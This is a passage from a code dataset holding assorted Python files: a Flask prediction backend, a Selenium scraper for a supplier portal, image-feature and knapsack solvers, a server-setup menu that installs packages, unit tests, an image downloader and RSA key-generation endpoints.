jsonify({'message':'4'})\r\n else:\r\n return jsonify({'message':'2'})\r\n else:\r\n return jsonify({'message':'1'})\r\n\r\n@app.route('/predict',methods=['GET','POST'])\r\ndef predict():\r\n data=request.json.get('key')\r\n data=data.split(',')\r\n #print(data)\r\n calc=PredictDisease(data)\r\n output=calc.make_prediction()\r\n return jsonify(output)\r\n\r\n@app.route('/cost',methods=['GET','POST'])\r\ndef cost():\r\n data=request.json.get('key')\r\n #data=data.split(',')\r\n print(data)\r\n calc=HealthExpenditure(data)\r\n output=calc.predict()\r\n output=round(output,2)\r\n print(output)\r\n return jsonify(output)\r\n #return jsonify(\"ssssssssssssssssss\")\r\n\r\n@app.route('/profile/',methods=['GET'])\r\n@token_required\r\ndef profile():\r\n data = request.data\r\n user = User.query.get(data['id'])\r\n if user:\r\n resp ={\r\n \"id\":user.id,\r\n 'username':user.username,\r\n 'email':user.email,\r\n \"image_file\":user.image_file,\r\n \"posts\":user.posts\r\n }\r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'This is a protected'})\r\n\"\"\"@app.route('/update/',methods=['POST'])\r\n@token_required\r\ndef update():\r\n data = request.data\r\n user = User.query.get(data['id'])\r\n user.\r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'This is a protected'})\"\"\"\r\n\r\ndef getApp():\r\n return app\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True,port=5000,host=\"0.0.0.0\")\r\n","sub_path":"PredxHack2020/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383368953","text":"import time\r\nimport pandas as pd\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport os\r\n# Today's date\r\ndate_label = time.strftime('%Y%m%d')\r\n\r\ntry:\r\n #local test Directory\r\n# work_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n# Download_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\temp_DL_file\\\\'\r\n# final_Inv_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n# CAN_final_Inv_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n# driver_path = 'C:\\\\Users\\\\PC\\\\chrome\\\\chromedriver.exe'\r\n\r\n work_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n Download_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\temp_DL_file\\\\'\r\n final_Inv_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n CAN_final_Inv_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n driver_path = 'C:\\\\Users\\\\User\\\\Anaconda3\\\\chrome\\\\chromedriver.exe'\r\n\r\n os.chdir(work_dir)\r\nexcept:\r\n # Directory\r\n work_dir = 'C:\\\\Users\\\\raymond.hung\\\\Documents\\\\Automate_Script\\\\DLpack_Wayfair\\\\'\r\n Download_dir = 'N:\\\\E Commerce\\\\Public Share\\\\Dot Com - Wayfair\\\\Product Watchlist\\\\temp_DL_file\\\\'\r\n final_Inv_dir = 'N:\\\\E Commerce\\\\Public Share\\\\Dot Com - Wayfair\\\\Product Watchlist\\\\'\r\n driver_path = 'C:\\\\Users\\\\raymond.hung\\\\chrome\\\\chromedriver.exe'\r\n os.chdir(work_dir)\r\n\r\n# Account and Password\r\nlogin_info = pd.read_csv(work_dir+ 'Account & Password.csv',index_col=0)\r\nusername = login_info.loc['Account', 'CONTENT']\r\npassword = login_info.loc['Password', 'CONTENT']\r\n\r\n# Chrome driver setting\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument('--start-maximized')\r\nprefs = {'profile.default_content_settings.popups': '0', 'download.default_directory' : Download_dir}\r\noptions.add_experimental_option('prefs', prefs)\r\ndriver = webdriver.Chrome(driver_path,chrome_options=options)\r\n\r\n# Wayfair supplier website\r\nWF_Extrant = 'https://partners.wayfair.com'\r\ndriver.get(WF_Extrant)\r\n\r\nLoadingChecker = (By.XPATH, '//*[@id=\"login\"]/button')\r\nWebDriverWait(driver, 120).until(EC.presence_of_element_located(LoadingChecker))\r\n# Input username and password and login\r\ndriver.find_element_by_id('js-username').send_keys(username)\r\ndriver.find_element_by_id('password_field').send_keys(password)\r\ndriver.find_element_by_xpath('//*[@id=\"login\"]/button').click()\r\ntime.sleep(10)\r\n\r\n# Click select box to choose US\r\ncss_body = 'body'\r\nif driver.find_element_by_css_selector(css_body).get_attribute('class') == ' extranet ':\r\n LOC = {'US':'Topline Furniture Warehouse Corp.', 'CAN':'CAN_Topline Furniture Warehouse Corp.'}\r\n css_common='body > div.wrapper > div:nth-child(1) > header > div > div > div.PH-Header > div > div.ex-Grid-item.ex-Grid-item--flex.u-flexShrink.ex-Grid-item--column.u-justifyEnd > div > div.PH-Header-information > div'\r\n LoadingChecker = (By.CSS_SELECTOR, css_common+' > span.ex-Box.ex-Block.ex-Block--display-flex.ex-Block--isFlex.ex-Block--flexWrap-wrap.ex-Block--alignItems-center.ex-Block--display-flex.ex-Box--ml-small')\r\n WebDriverWait(driver, 30).until(EC.presence_of_element_located(LoadingChecker))\r\n driver.find_element_by_css_selector(css_common+' > span.ex-Box.ex-Block.ex-Block--display-flex.ex-Block--isFlex.ex-Block--flexWrap-wrap.ex-Block--alignItems-center.ex-Block--display-flex.ex-Box--ml-small').click()\r\n for i in range(1, 3):\r\n try:\r\n box_text = driver.find_element_by_css_selector(css_common+'> span.PH-HeaderDropdown-value > ul > li:nth-child('+str(i)+') > button').text\r\n if box_text == 'Topline Furniture Warehouse Corp.':\r\n driver.find_element_by_css_selector(css_common+'> span.PH-HeaderDropdown-value > ul > li:nth-child('+str(i)+') > button').click()\r\n time.sleep(30)\r\n break\r\n except:\r\n print(\"switch LOC fail\")\r\n driver.refresh()\r\n time.sleep(30)\r\n\r\nelif driver.find_element_by_css_selector(css_body).get_attribute('class') == ' extranet body_new_layout':\r\n LOC ={'US':'Topline', 'CAN':'CAN_Topline Furniture'}\r\n css_select_box = 'body > div.wrapper.wrapper_new_layout > div > div > div.BaseBox-ofhg3j-0.dfeQgM > div.BaseBox-ofhg3j-0.bSmOIL > div > div > div.BaseBox-ofhg3j-0.gknKYY > div:nth-child(1) > div > button > div.BaseBox-ofhg3j-0.dBiCLz'\r\n LoadingChecker = (By.CSS_SELECTOR, css_select_box)\r\n WebDriverWait(driver, 30).until(EC.presence_of_element_located(LoadingChecker))\r\n driver.find_element_by_css_selector(css_select_box).click()\r\n for i in range(1, 3):\r\n try:\r\n css_box_text = 'body > div.wrapper.wrapper_new_layout > div > div > div.BaseBox-ofhg3j-0.dfeQgM > div.BaseBox-ofhg3j-0.bSmOIL > div > div > div.BaseBox-ofhg3j-0.gknKYY > div:nth-child(1) > div.react-tiny-popover-container > div > ul > li:nth-child('+str(i)+') > button > div'\r\n box_text = driver.find_element_by_css_selector(css_box_text).text\r\n if box_text == 'Topline':\r\n driver.find_element_by_css_selector(css_box_text).click()\r\n time.sleep(30)\r\n break\r\n except:\r\n print(\"switch LOC fail\")\r\n driver.refresh()\r\n time.sleep(30)\r\n\r\n#click Product Watchlist-ALL\r\ndriver.find_element_by_xpath('//*[@id=\"tab:2\"]/span/span[1]').click()\r\n\r\n#20rows\r\ns1 = Select(driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[2]/select'))\r\ns1.select_by_visible_text('20 rows')\r\ntime.sleep(10)\r\n\r\n#page1\r\nfor i in range(0,3):\r\n driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[1]/div/input').send_keys(Keys.BACK_SPACE)\r\ndriver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[1]/div/input').send_keys(\"1\")\r\ndriver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[1]/div/input').send_keys(Keys.ENTER)\r\n\r\ntime.sleep(10)\r\n\r\n#title\r\ntable_top_list=driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[1]/div[1]/div').text.splitlines() \r\ntable_top_list.insert(5,'Customer Score')\r\ndata = pd.DataFrame(columns=table_top_list)\r\ndata_row=0\r\n\r\nt_page=int(driver.find_element_by_class_name('-totalPages').text)\r\n#page104\r\nfor page in range(0,t_page-1):\r\n pagechecker = 'rt-tr-group'\r\n LoadingChecker = (By.CLASS_NAME, pagechecker)\r\n WebDriverWait(driver, 60).until(EC.presence_of_element_located(LoadingChecker))\r\n #content\r\n while 1==1: # waiting for javascript ready\r\n try:\r\n item_table=driver.find_elements_by_class_name('rt-tr-group')\r\n break\r\n except:\r\n time.sleep(3)\r\n pass\r\n for row in range(0,20):\r\n item_info=item_table[row].text.splitlines() \r\n if len(item_info)<8:\r\n item_info.insert(5,'-')\r\n data.loc[data_row]=item_info\r\n else:\r\n data.loc[data_row]=item_info\r\n #next page\r\n data_row+=1\r\n while 1==1: # waiting for javascript ready\r\n try:\r\n driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[3]').click()\r\n break\r\n except:\r\n time.sleep(10)\r\n pass\r\n print(page)\r\n \r\ndata.to_csv(final_Inv_dir+'Product Watchlist'+date_label+'.csv',index=False)\r\n\r\n\r\n\r\n \r\ndriver.quit() \r\n\r\n\r\n\r\n\r\n","sub_path":"DL_WF_Product_Watchlist.py","file_name":"DL_WF_Product_Watchlist.py","file_ext":"py","file_size_in_byte":7589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"213681828","text":"from pathlib import Path\nimport time\nimport random\n\nimport cv2\nimport numpy as np\nfrom numpy.lib.ufunclike import _fix_and_maybe_deprecate_out_named_y\n\n\"\"\" functions \"\"\"\n\ndef create_dataset(valid_tags_path, rejected_tags_path, bins=4):\n\n # creates a histogram if a image\n def find_image_features(path):\n features = []\n\n # read image, find shape\n img = cv2.imread(str(path), 0)\n width, height = img.shape\n\n # create histogram and convert to percentiles\n hist = cv2.calcHist([img], [0], None, [bins], [0, 256])\n histogram_bins = list(np.array(hist[:, 0], np.float32) / (width * height))\n features.extend(histogram_bins)\n\n # count edges\n edges = cv2.Canny(img, 100, 200, apertureSize=3)\n edge_pixels = np.sum(edges == 255) / edges.size\n features.append(edge_pixels)\n\n # do fft\n f = np.fft.fft2(img)\n fft_sum = (np.sum(f.real) / f.size) / 255\n features.append(fft_sum)\n\n\n # return histogram\n return features\n\n # finds images in folder and returns a list\n def find_images(path_str):\n input_path = Path(path_str)\n image_path_list = list(input_path.glob(\"*.png\"))\n\n # quality control\n if len(image_path_list) == 0:\n print(f\"Found 0 images in \\\"{input_path}\\\"\")\n return None\n else:\n return image_path_list\n\n # input data folders\n valid_tags = find_images(valid_tags_path)\n rejected_tags = find_images(rejected_tags_path)\n\n t_start = time.time()\n\n x_data = []\n y_label = []\n for img_path in valid_tags:\n # hist, n_edges, fft_sum = find_image_features(img_path)\n x_data.append(find_image_features(img_path))\n y_label.append(1)\n\n for img_path in rejected_tags:\n # hist, n_edges, fft_sum = find_image_features(img_path)\n x_data.append(find_image_features(img_path))\n y_label.append(0)\n\n t_completed = time.time() - t_start\n\n # # normalize values to 0,1\n # x_data = np.array(x_data)\n # x_data = x_data / x_data.max(axis=0)\n\n\n # print(f\"Processed {len(valid_tags) + len(rejected_tags)} images in {t_completed:.2f} s\")\n return x_data, y_label\n\n\n\"\"\" main \"\"\"\nif __name__ == \"__main__\":\n # create dataset\n valid = \"evaluation_images/valid_tags/charuco_CH1_35-15_x_png\"\n rejects = \"evaluation_images/rejected_tags/charuco_CH1_35-15_sorted\"\n\n X, y = create_dataset(valid, rejects)\n for i, x in enumerate(X[:5]):\n print(i, x, y[i])","sub_path":"evaluation/create_data/create_all-feature_dataset.py","file_name":"create_all-feature_dataset.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"92510138","text":"import os, sys, time\n\n\ndef author():\n\tprint (\"\\n\\tAUTHOR\\n\\t===================================\\n\\tCREATED BY : ahmadrivaldi_arv\\n\\tCODED BY : rivaldi\\n\\tGITHUB : https://github.com/ahmadrivaldi-arv\\n\\t\\t \\n\\tREPORT BUG ON FACEBOOK OR INSTAGRAM\\n\\t===================================\\n\\tfb : ahmad rivaldi\\n\\tig : ahmadrivaldi_arv\\n\\t===================================\\n\\t\")\n\ndef clear():\n\tos.system(\"clear\")\n\nos.system(\"clear\")\n\nauthor()\n\ndef menu():\n\tprint(\"1. Konfigurasi IP\")\n\tprint(\"2. Konfigurasi DNS\")\n\tprint(\"3. Konfigurasi SAMBA\")\n\tprint(\"4. Konfigurasi VOIP\")\n\tprint(\"5. Konfigurasi FTP\")\n\tprint(\"6. Quit\\n\")\n\t\n\n\tchs=input(\"Pilih: \")\n\tif (chs=='1'):\n\t\tfrom modul.ip import menuip\n\t\tos.system(\"clear\")\n\t\tmenuip()\n\telif chs=='2':\n\t\tclear()\n\t\tos.system(\"apt-get install bind9 -y\")\n\t\tinput(\"\\nTekan ENTER untuk melanjutkan \")\n\t\tos.system(\"clear\")\n\t\tfrom modul.named import zone\n\t\tzone()\n\telif chs=='3':\n\t\tclear()\n\t\tos.system(\"apt-get install samba -y\")\n\t\tinput(\"\\nTekan ENTER untuk melanjutkan \" )\n\t\tos.system(\"clear\")\n\t\tfrom modul.samba import smb\n\t\tsmb()\n\telif chs=='4':\n\t\tclear()\n\t\tprint(\"\\nMasukan Debian 8 DVD 2\\n\")\n\t\tos.system(\"apt-cdrom add \")\n\t\tos.system(\"apt-get install asterisk -y\")\n\t\tclear()\n\t\tfrom modul.voip import voip\n\t\tvoip()\n\telif chs=='5':\n\t\tclear()\n\t\tos.system(\"apt-get install proftpd -y\")\n\t\tclear()\n\t\tfrom modul.proftpd import ftp\n\t\tftp()\n\telif chs=='6':\n\t\tsys.exit()\n\telse:\n\t\t\n\t\tprint(\"\\nMohon Pilih Dengan Benar\\n\")\n\t\tmenu()\n\nmenu()\n\n\n\n#____________________________\n#|\t\t\t\t\t\t\t|\n#|\t\t\tAuthor \t\t\t|\n#|\t\t Ahmad rivaldi\t\t|\n#|__________________________|","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"466471987","text":"import sys\n\nfrom OmarHuanca.python.session1.AssignmentOperators import AssignmentOperators\nfrom OmarHuanca.python.session1.ComparisonOperators import ComparisonOperators\nfrom OmarHuanca.python.session1.IdentityOperators import IdentityOperators\nfrom OmarHuanca.python.session1.MembershipOperators import MembershipOperators\nfrom OmarHuanca.python.session1.PerformOperation import PerformOperation\n\n\nclass MainMenu:\n\n def __init__(self):\n\n self.main_menu()\n\n def main_menu(self):\n\n while True:\n print(\"=========================================================\")\n print(\"Welcome to Python Operators - Samples\")\n print(\"=========================================================\")\n print(\"(1) - Arithmetic's Operators\")\n print(\"(2) - Comparison Operators\")\n print(\"(3) - Assignment Operators\")\n print(\"(4) - Membership Operators\")\n print(\"(5) - Identity Operators\")\n print(\"(6) - Practice\")\n print(\"(7) - Exit\")\n\n try:\n option = input('Enter your option: ')\n except SyntaxError:\n option = 0\n pass\n\n if option is \"1\":\n self.perform_operation()\n elif option is \"2\":\n self.comparison_operators()\n elif option is \"3\":\n self.assignment_operators()\n elif option is \"4\":\n self.membership_operators()\n elif option is \"5\":\n self.identity_operators()\n elif option is \"6\":\n self.practice_operator()\n elif option is \"7\":\n sys.exit()\n\n def perform_operation(self):\n\n PerformOperation(\"+\", 2, 2)\n PerformOperation(\"-\", 2, 1)\n PerformOperation(\"*\", 2, 1)\n PerformOperation(\"/\", 2, 1)\n PerformOperation(\"%\", 2, 1)\n PerformOperation(\"**\", 2, 2)\n PerformOperation(\"//\", -11, 3)\n PerformOperation(\"++\", 2, 1)\n\n def comparison_operators(self):\n\n ComparisonOperators(\"==\", \"a\", \"b\")\n ComparisonOperators(\"!=\", \"a\", \"b\")\n ComparisonOperators(\">\", 2, 1)\n ComparisonOperators(\"<\", 2, 1)\n ComparisonOperators(\">=\", 2, 1)\n ComparisonOperators(\"<=\", 2, 2)\n ComparisonOperators(\">>=\", 2, 1)\n\n def assignment_operators(self):\n\n AssignmentOperators(\"=\", 1, 2)\n AssignmentOperators(\"+=\", 2, 2)\n AssignmentOperators(\"-=\", 2, 2)\n AssignmentOperators(\"*=\", 2, 2)\n AssignmentOperators(\"/=\", 2, 2)\n AssignmentOperators(\"%=\", 2, 2)\n AssignmentOperators(\"/==\", 2, 1)\n\n def membership_operators(self):\n\n MembershipOperators(\"in\", [1, 2, 3, 4, 5, 6, 7], 4)\n MembershipOperators(\"in\", [\"a\", \"b\", \"c\", \"d\"], \"b\")\n MembershipOperators(\"not in\", [1, 2, 3, 4, 5, 6, 7], 0)\n MembershipOperators(\"not in\", [\"a\", \"b\", \"c\", \"d\"], \"E\")\n MembershipOperators(\"is in\", [\"a\", \"b\", \"c\", \"d\"], \"E\")\n\n def identity_operators(self):\n\n IdentityOperators(\"is\", 4, 4)\n IdentityOperators(\"is\", \"a\", \"a\")\n IdentityOperators(\"is not\", 5, 6)\n IdentityOperators(\"is not\", \"B\", \"b\")\n IdentityOperators(\"is in\", 1, 1)\n\n def practice_operator(self):\n\n print(\"=========================================================\")\n print(\"Please select Operator to practice \")\n print(\"(1) - Arithmetic's Operators\")\n print(\"(2) - Comparison Operators\")\n print(\"(3) - Assignment Operators\")\n print(\"(4) - Membership Operators\")\n print(\"(5) - Identity Operators\")\n\n try:\n practice_option = input('Enter your option: ')\n except SyntaxError:\n pass\n\n if practice_option is \"1\":\n operator = input(\"Insert Operator: + , - , * , / , % , ** , // : \")\n first_value = input(\"Insert first number value: \")\n second_value = input(\"Insert second number value: \")\n PerformOperation(operator, first_value, second_value)\n elif practice_option is \"2\":\n operator = input(\"Insert Operator: == , != , > , < , >= , <= : \")\n first_value = input(\"Insert first value: \")\n second_value = input(\"Insert second value: \")\n ComparisonOperators(operator, first_value, second_value)\n elif practice_option is \"3\":\n operator = input(\"Insert Operator: = , += , -= , *= , /= , %= : \")\n first_value = input(\"Insert first value: \")\n second_value = input(\"Insert second value: \")\n AssignmentOperators(operator, first_value, second_value)\n elif practice_option is \"4\":\n operator = input(\"Insert Operator: 'in' , 'not in' : \")\n first_value = input(\"Insert list e.g. '[1,2,3,4,5,]': \")\n second_value = input(\"Insert value to find on list before \")\n MembershipOperators(operator, first_value, second_value)\n elif practice_option is \"5\":\n operator = input(\"Insert Operator: 'is' , 'is not' : \")\n first_value = input(\"Insert first value: \")\n second_value = input(\"Insert second value: \")\n IdentityOperators(operator, first_value, second_value)\n elif practice_option is \"7\":\n pass\n\n\nscript = MainMenu()\n","sub_path":"OmarHuanca/python/session1/MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50044724","text":"import unittest\nimport collections\nfrom fontParts.base import FontPartsError\n\n\nclass TestGuideline(unittest.TestCase):\n\n def getGuideline_generic(self):\n guideline, unrequested = self.objectGenerator(\"guideline\")\n guideline.x = 1\n guideline.y = 2\n guideline.angle = 90\n return guideline, unrequested\n\n # --------\n # Position\n # --------\n\n def test_x(self):\n guideline, unrequested = self.getGuideline_generic()\n # get\n self.assertEqual(\n guideline.x,\n 1\n )\n # set: valid\n guideline.x = 0\n self.assertEqual(\n guideline.x,\n 0\n )\n guideline.x = 1\n self.assertEqual(\n guideline.x,\n 1\n )\n guideline.x = -1\n self.assertEqual(\n guideline.x,\n -1\n )\n guideline.x = 1.1\n self.assertEqual(\n guideline.x,\n 1.1\n )\n guideline.x = -1.1\n self.assertEqual(\n guideline.x,\n -1.1\n )\n # set: invalid\n with self.assertRaises(FontPartsError):\n guideline.x = \"ABC\"\n\n # ----\n # Hash\n # ----\n def test_hash(self):\n guideline, unrequested = self.getGuideline_generic()\n self.assertEqual(\n isinstance(guideline, collections.Hashable),\n False\n )\n\n # --------\n # Equality\n # --------\n\n def test_equal(self):\n guideline_one, unrequested = self.getGuideline_generic()\n guideline_two, unrequested = self.getGuideline_generic()\n self.assertEqual(\n guideline_one,\n guideline_one\n )\n self.assertNotEqual(\n guideline_one,\n guideline_two\n )\n a = guideline_one\n self.assertEqual(\n guideline_one,\n a\n )\n self.assertNotEqual(\n guideline_two,\n a\n )\n","sub_path":"Lib/fontParts/test/test_guideline.py","file_name":"test_guideline.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570321406","text":"from typing import List\nfrom knapsack import Item, Knapsack\nfrom simpleHeuristic import SimpleHeuristic\nfrom metaheuristic import solveMetaheuristic\nfrom hyperheuristic import HyperheuristicNaive, hyperheuristicSolver\nfrom exactSolvers import kpBacktracking, kpDP\nfrom ortools.algorithms import pywrapknapsack_solver\n\ndef kpIP(C: int, items: List[Item]):\n solver = pywrapknapsack_solver.KnapsackSolver(\n pywrapknapsack_solver.KnapsackSolver.\n KNAPSACK_MULTIDIMENSION_CBC_MIP_SOLVER, 'KnapsackExample')\n \n profit = [item.getProfit() for item in items]\n weights = [[item.getWeight() for item in items]]\n capacities = [C]\n solver.Init(profit, weights, capacities)\n computed_value = solver.Solve()\n\n kp = Knapsack(C)\n for i, item in enumerate(items):\n if solver.BestSolutionContains(i):\n kp.pack(item)\n return kp\n\ndef ConstructiveSolution(kp: Knapsack, items: List[Item], itemSelector):\n nextItem = itemSelector.nextItem(kp, items)\n while nextItem is not None:\n kp.pack(items[nextItem])\n items.pop(nextItem)\n nextItem = itemSelector.nextItem(kp, items)\n return kp\n\n\ndef solver(method: str, kp: Knapsack, items: List[Item], additionalArgs = None):\n if method == 'heuristic':\n simple_heuristic = SimpleHeuristic(additionalArgs)\n return ConstructiveSolution(kp, items, simple_heuristic).getValue()\n elif method == 'SimulatedAnnealing':\n return solveMetaheuristic(method, kp, items, additionalArgs)\n elif method == 'RandomSearch':\n return solveMetaheuristic(method, kp, items, additionalArgs)\n elif method == 'hyperheuristicNaive':\n hh = HyperheuristicNaive(additionalArgs)\n return ConstructiveSolution(kp, items, hh).getValue()\n elif method == 'hyperheuristic':\n return hyperheuristicSolver(kp, items, additionalArgs).getValue()\n elif method == 'recursive':\n return kpBacktracking(kp.getCapacity(), items).getValue()\n elif method == 'DP':\n return kpDP(kp.getCapacity(), items).getValue()\n elif method == 'IP':\n return kpIP(kp.getCapacity(), items).getValue()\n else:\n return 0\n","sub_path":"solvers.py","file_name":"solvers.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"544222360","text":"# -*- coding: utf-8 -*-\nimport pyquery\nimport pymongo\nimport datetime\nimport os\nimport sys\nimport urllib\nimport threading\nfrom time import ctime, sleep\n\n\ndef download_20_pages(skip):\n # Connect MongoDB Server\n client = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n # Connect Database\n db = client.beauty\n # Use collection\n collection = db['mm131']\n docs = collection.find({\"images_downloaded\": None}).limit(20).skip(skip)\n for doc in docs:\n # print doc\n local_folder = doc[\"local_folder\"]\n title = doc[\"title\"]\n total_page = doc[\"total_page\"]\n first_page = doc[\"first_page\"]\n #print first_page\n #print total_page\n page_path = first_page.__str__().replace('1.jpg', '')\n #print page_path\n number = 1\n while int(number) <= int(total_page):\n url = page_path + number.__str__() + '.jpg'\n print(url)\n data = urllib.urlopen(url).read()\n path = local_folder + '/' + title + '_' + number.__str__() + '.jpg'\n if not (os.path.exists(path)):\n f = file(path, \"wb\")\n f.write(data)\n f.flush()\n f.close()\n number = number + 1\n collection.update({\n \"_id\": doc[\"_id\"]\n }, {\n \"$set\": {\n \"images_downloaded\": 1\n }\n })\n\n\n# Connect MongoDB Server\nclient = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n# Connect Database\ndb = client.beauty\n# Use collection\ncollection = db['mm131']\ncount = collection.find({\"images_downloaded\": None}).count()\n\nwhile count > 0:\n threads = []\n t1 = threading.Thread(target=download_20_pages, args=(0, ))\n threads.append(t1)\n #t2 = threading.Thread(target=download_20_pages,args=(20,))\n #threads.append(t2)\n #t3 = threading.Thread(target=download_20_pages,args=(40,))\n #threads.append(t3)\n #t4 = threading.Thread(target=download_20_pages,args=(60,))\n #threads.append(t4)\n\n for t in threads:\n t.setDaemon(True)\n t.start()\n t.join()\n count = collection.find({\"images_downloaded\": None}).count()\n","sub_path":"Download_Image.py","file_name":"Download_Image.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"593856242","text":"def writeKeyValue(array):\n\n counter = 0\n\n newArray = []\n\n keyValues = {\n \"year\" : 0,\n \"exports\" : 0,\n \"weight\" : 0,\n \"area\" : 0,\n \"growers\" : 0\n }\n\n for i in range(len(array)):\n if(counter == 0):\n keyValues[\"year\"] = array[i]\n counter += 1\n elif (counter == 1):\n keyValues[\"exports\"] = array[i]\n counter += 1\n elif (counter == 2):\n keyValues[\"weight\"] = array[i]\n counter += 1\n elif (counter == 3):\n keyValues[\"area\"] = array[i]\n counter += 1\n elif (counter == 4):\n keyValues[\"growers\"] = array[i]\n counter = 0\n newArray.append(keyValues)\n keyValues = {\n \"year\" : 0,\n \"exports\" : 0,\n \"weight\" : 0,\n \"area\" : 0,\n \"growers\" : 0\n }\n\n\n for j in range(len(newArray)):\n data = newArray[j]\n printData = \"{\\n\" + \" year: \" + str(data[\"year\"]) + \",\"\n printData += \"\\n exports: \" + str(data[\"exports\"]) + \",\"\n printData += \"\\n weight: \" + str(data[\"weight\"]) + \",\"\n printData += \"\\n area: \" + str(data[\"area\"]) + \",\"\n printData += \"\\n growers: \" + str(data[\"growers\"]) + \"\\n}\"\n if(j != len(newArray) - 1):\n printData += \",\"\n print(printData)\n\t\t\ndataArray = [2002,0.6,0,0,0,2003,0.9,0,112,0,2004,0.6,0,112,0,2005,0.5,0,112,0,2006,0.2,0,112,0,2007,0.3,0,29,0,2008,0,0,37,0,2009,0.5,0,37,0,2010,0.5,0,37,0,2011,0.4,0,37,0,2012,0.3,0,37,0,2013,0.2,0,37,0,2014,0.2,0,43,0]\n\nwriteKeyValue(dataArray)\n\t\n\t\n \n","sub_path":"Portfolio/PortfolioFiles/Sprint 2 deliverables/dataTransformScript.py","file_name":"dataTransformScript.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55373675","text":"import io\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom flask import send_file, request\nfrom flask_restful import Resource\n\n\nclass PrivateKey(Resource):\n\n @classmethod\n def get(cls):\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n\n pem = private_key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.PKCS8,\n encryption_algorithm=serialization.NoEncryption()\n )\n\n with open('privatekey.cer', 'wb') as f:\n f.write(pem)\n\n return send_file(\n io.BytesIO(pem),\n attachment_filename='privatekey.cer',\n mimetype='application/x-x509-ca-cert'\n )\n\n\nclass PublicKey(Resource):\n\n @classmethod\n def get(cls):\n # print(request.files)\n private_key = request.files['private_key']\n private_key = serialization.load_pem_private_key(\n private_key.read(),\n password=None,\n backend=default_backend()\n )\n\n public_key = private_key.public_key()\n pub = public_key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo\n )\n\n with open('publickey.cer', 'wb') as f:\n f.write(pub)\n f.close()\n\n return send_file(\n io.BytesIO(pub),\n attachment_filename='publickey.cer',\n mimetype='application/x-x509-ca-cert'\n )\n","sub_path":"resources/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"306429418","text":"##def cariLurus(wadah,target):\n## n=len(wadah)\n## for i in range(n):\n## if wadah[i]==target:\n## return True\n## return False\n##class mhsTi(object):\n## def __init__(self,nama,nim,kota,us):\n## self.nama=nama\n## self.nim=nim\n## self.kotaTinggal=kota\n## self.uangsaku=us\n## \n##a1=mhsTi('Taki',12,'Solo',400000)\n##a2=mhsTi('ciko',10,'Sukoharjo',4500000)\n##a3=mhsTi('ahmad',11,'Klaten',475000)\n##a4=mhsTi('zaki',13,'Kra',450000)\n##a5=mhsTi('putri',14,'Jogja',300000)\n##a6=mhsTi('malu',15,'Surabaya',600000)\n##a7=mhsTi('wani',16,'Bandung',1000000)\n##\n##Daftar=[a1,a2,a3,a4,a5,a6,a7]\n##\n##target='Klaten'\n##for i in Daftar:\n## if i.kotaTinggal==target:\n## print(i.nama+' tinggal di '+target)\n##\n##def cariTerkecil(kumpulan):\n## n=len(kumpulan)\n## 